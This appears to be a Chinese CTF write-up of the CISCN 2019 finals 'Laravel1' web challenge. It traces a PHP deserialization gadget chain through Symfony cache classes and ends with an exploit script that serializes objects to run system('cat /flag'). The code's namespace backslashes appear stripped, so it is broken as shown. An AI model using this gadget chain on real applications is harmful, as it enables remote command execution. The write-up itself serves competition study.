[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

admin

139646
文章

114
评论

2022年4月25日23:09:47评论100 views字数 1006阅读3分21秒阅读模式

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

界面如上，比较单一：

指出了反序列化的点：还有备份文件。

下面反序列化的入口：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

就当找到了吧：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

确实可以跳转：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

可控：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

寻找这个类，看是否被调用：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

开始寻找使用了saveDeferred类的：

看别人的WP这个是唯一可以使用的:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

调用了本类的initialise方法，但前文并没有定义，据其他WP说是会去父类找,

偷一张其继承关系的图：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

查询得到其主要父类，尝试全局搜索initialise()

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

include可以使用：

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

那么在之前的那个PhpArrayAdapter.php中定义好$this->file,只要其存在就能包含出来：

贴exp:

<?php
namespace SymfonyComponentCacheAdapter;
class TagAwareAdapter{    public $deferred = array();    function __construct($x){        $this->pool = $x;    }}
class ProxyAdapter{    protected $setInnerItem = 'system';}
namespace SymfonyComponentCache;
class CacheItem{    protected $innerItem = 'cat /flag';}
$a = new SymfonyComponentCacheAdapterTagAwareAdapter(new SymfonyComponentCacheAdapterProxyAdapter());$a->deferred = array('aa'=>new SymfonyComponentCacheCacheItem);echo urlencode(serialize($a));